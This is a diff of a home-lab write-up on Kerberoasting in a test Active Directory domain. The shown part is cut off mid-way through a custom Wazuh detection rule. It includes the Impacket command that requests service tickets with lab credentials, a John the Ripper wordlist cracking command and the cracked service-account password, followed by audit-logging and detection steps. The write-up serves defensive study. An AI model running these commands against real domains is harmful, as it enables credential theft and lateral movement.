lev-ijtor/Home-Cybersecurity-Lab/labs/04-kerberoasting.md

 MSSQLSvc/dc01.lab.local:1443  sqlsvc            2026-04-19
 ```

-`sqlsvc` has an SPN registered — making it a Kerberoasting target.
-Impacket automatically requested the TGS ticket and returned the hash.
+sqlsvc has an SPN registered which makes it a Kerberoasting target.
+Impacket automatically requested the TGS ticket and returned the hash in one step.

 ---

-## Phase 2 — Hash Extraction
+## Phase 2 - Hash Extraction

-The TGS ticket hash was returned directly by Impacket:
+The hash came back directly in the Impacket output:

 ```
 $krb5tgs$23$*sqlsvc$LAB.LOCAL$lab.local/sqlsvc*$77b9a5d1fa6a300e9a93e95d90db474f$...
 ```

-Key indicators in the hash:
-- `$krb5tgs$23$` — Kerberos TGS ticket, etype 23 (RC4-HMAC)
-- `sqlsvc` — target service account
-- `LAB.LOCAL` — target domain

-Saved to file:
+The `$krb5tgs$23$` prefix indicates etype 23 which is RC4-HMAC.
+That matters for detection later.
+Saved the hash to a file:

 ```bash
 impacket-GetUserSPNs lab.local/jsmith:Password123! -dc-ip 10.0.0.200 -request > kerberoast.txt
 ```

 ---

-## Phase 3 — Offline Password Cracking
+## Phase 3 - Offline Password Cracking

-Used John the Ripper to crack the hash offline.
-No network traffic, no lockouts, no detection from cracking alone:
+Ran John the Ripper against the hash.
+No network traffic involved at this stage, no lockouts possible:

 ```bash
 john --wordlist=/usr/share/wordlists/rockyou.txt kerberoast.txt
 ```

-**Result:**
+Result:

 ```
 MSSQLSvc2024!    (sqlsvc)
 ```

-With the sqlsvc password recovered, an attacker could:
-- Authenticate as sqlsvc to SQL Server instances
-- Attempt lateral movement across the domain
-- Use the account for persistence
+Password cracked.
+An attacker with this credential could authenticate as sqlsvc to any SQL Server in the domain, move laterally, or use the account for persistence.

 ---

-## Phase 4 — Detection Engineering
+## Phase 4 - Detection Engineering

-### Why Default Wazuh Rules Miss This

-Windows logs every Kerberos ticket request as Event ID 4769.
-However:
-- 4769 events are extremely noisy in an AD environment
-- Wazuh's default rules don't distinguish Kerberoasting from normal ticket requests
+Event ID 4769 is logged every time a Kerberos service ticket is requested.
+The problem is that 4769 events are extremely noisy in any AD environment.
+Every service access generates one.
+Wazuh's default rules don't distinguish Kerberoasting from normal ticket requests.
-- The key indicator is the **encryption type** — RC4 (`0x17`) vs AES (`0x12`/`0x11`)

-### Prerequisites
+The detection angle is the encryption type.
+Kerberoasting tools request RC4 encrypted tickets (0x17) because RC4 is faster to crack offline.
+Modern systems use AES (0x12 or 0x11) by default.
+A 4769 event with RC4 encryption targeting a non-machine account is a high-confidence Kerberoasting indicator.

-Enabled Kerberos audit logging on DC01:
+First enabled Kerberos audit logging on DC01 so the events get generated:

 ```cmd
 auditpol /set /subcategory:"Kerberos Service Ticket Operations" /success:enable /failure:enable
 ```

-### Custom Wazuh Rule

-Wrote a custom detection rule targeting the specific combination of fields that indicate Kerberoasting.
-Added to `/var/ossec/etc/rules/local_rules.xml` on the Wazuh manager:
+Then wrote a custom rule in `/var/ossec/etc/rules/local_rules.xml` on the Wazuh manager:

 ```xml
 <group name="kerberoasting,">